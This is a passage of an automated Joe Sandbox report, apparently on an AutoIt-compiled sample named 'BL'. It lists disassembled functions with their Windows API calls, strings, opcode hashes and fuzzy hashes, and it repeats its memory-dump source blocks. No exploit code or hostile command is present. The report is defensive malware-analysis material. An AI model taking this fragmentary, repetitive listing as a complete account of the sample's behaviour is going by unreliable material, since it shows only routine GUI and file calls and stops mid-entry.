                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                            • API String ID: 0-1896584978
                                                                                                                            • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                            • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                                                                            • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                            • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                                                                            Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1927566239-0
                                                                                                                            • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                            • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                            • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                            • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                                            Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                            • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                            • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                            • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                            • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                            • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                            • API String ID: 1322021666-1919597938
                                                                                                                            • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                            • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                            • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                            • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                            Function 0045DE12 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                                                                            • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                                                                            • __wsplitpath.LIBCMT ref: 0045DF54
                                                                                                                            • _wcscat.LIBCMT ref: 0045DF6C
                                                                                                                            • _wcscat.LIBCMT ref: 0045DF7E
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                                                                            • _wcscpy.LIBCMT ref: 0045E019
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 3201719729-438819550
                                                                                                                            • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                            • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                                                                            • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                            • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                                                                            Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsicoll$IconLoad
                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                            • API String ID: 2485277191-404129466
                                                                                                                            • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                            • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                                            • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                            • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                                            Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                                            • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                                            • strncnt.LIBCMT ref: 00428646
                                                                                                                            • strncnt.LIBCMT ref: 0042865A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strncnt$CompareErrorLastString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1776594460-0
                                                                                                                            • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                            • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                            • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                            • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                                            Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                                            • GetDesktopWindow.USER32 ref: 00454708
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                                            • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3869813825-0
                                                                                                                            • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                            • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                                            • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                            • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                                            Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                                                            • GetCursorInfo.USER32 ref: 00458E03
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$Load$Info
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2577412497-0
                                                                                                                            • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                            • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                                            • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                            • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                                            Function 00469681 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                                            • GetFocus.USER32 ref: 004696E0
                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$CtrlFocus
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1534620443-4108050209
                                                                                                                            • Opcode ID: ff00ec732dd06da7480cfd50de3633a83f3a61379b8a8b3e564d18e7af3fa5cd
                                                                                                                            • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                            • Opcode Fuzzy Hash: ff00ec732dd06da7480cfd50de3633a83f3a61379b8a8b3e564d18e7af3fa5cd
                                                                                                                            • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                            Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00468107
                                                                                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                            • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                            • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                            • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                            • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                            • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                            • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                            • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 3993528054-4108050209
                                                                                                                            • Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                                                                            • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                                            • Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                                                                            • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                                                            Function 0046F2B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                                              • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                              • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                              • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                            • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                            • _wcscat.LIBCMT ref: 0046F3BC
                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                            • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                            • API String ID: 4085615965-3440237614
                                                                                                                            • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                            • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                            • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                            • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                                                            Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsicoll
                                                                                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                            • API String ID: 3832890014-4202584635
                                                                                                                            • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                            • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                                                            • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                            • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                                                            Function 00466999 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 312COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004669C4
                                                                                                                            • _wcsncpy.LIBCMT ref: 00466A21
                                                                                                                            • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                            • _wcstok.LIBCMT ref: 00466A90
                                                                                                                              • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                                                            • _wcstok.LIBCMT ref: 00466B3F
                                                                                                                            • _wcscpy.LIBCMT ref: 00466BC8
                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                                            • _wcslen.LIBCMT ref: 00466D1D
                                                                                                                            • _memset.LIBCMT ref: 00466BEE
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • _wcslen.LIBCMT ref: 00466D4B
                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
